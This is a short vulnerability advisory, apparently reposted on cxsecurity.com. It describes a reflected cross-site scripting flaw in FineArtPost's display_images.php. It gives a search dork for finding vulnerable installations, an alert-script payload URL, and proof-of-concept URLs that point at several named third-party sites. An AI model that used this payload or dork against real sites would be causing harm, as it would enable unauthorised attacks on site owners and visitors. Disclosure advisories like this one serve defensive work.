FineArtPost Cross Site Scripting

2012.01.14
Credit: ITTIHACK
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

FineArtPost XSS ( Cross Site Scripting ) Vulnerability Software : FineArtPost Date : 7/1/2012 Vendor : http://www.fineartpost.com/ Get App. : http://www.fineartpost.com/about_fap/pricing.php Beta : http://www.fineartpost.com/fap2/beta.php Price : $149.59 Dork : inurl:"/display_images.php?u_id=" "FineArtPost" Author : ITTIHACK Home : http://ittihack.com Vulnerable file : display_images.php Exploit : http://site/path/display_images.php?u_id=<script>alert(2012)</script> Proof of concept: http://www.greslearthart.com/public/display_images.php?u_id=<script>alert(2012)</script> http://www.clairecolemanart.com/public/display_images.php?u_id=<script>alert(2012)</script> http://www.annrutecki.com/public/display_images.php?u_id=<script>alert(2012)</script> http://www.fineartpost.com/harmon/public/display_images.php?u_id=<script>alert(2012)</script> #Greatz to: ___ ____ ____ #````______/```\__//```\__/____\ #``_/```\_/``:```````````//____\ #`/|``````:``:``..``````/ Reinie \ #|`|`````::`````::``````\````````/ #|`|`````:|`````||`````\`\______/ #|`|`````||`````||``````|\``/``| #`\|`````||`````||``````|```/`|`\ #``|`````||`````||``````|``/`/_\`\ #``|`___`||`___`||``````|`/``/````\ #```\_-_/``\_-_/`|`____`|/__/``````\ #````````````````_\_--_/````\`````/ #```````````````/____```````````/ #``````````````/`````\`````````/ #``````````````\______\_______/

References:

http://www.fineartpost.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top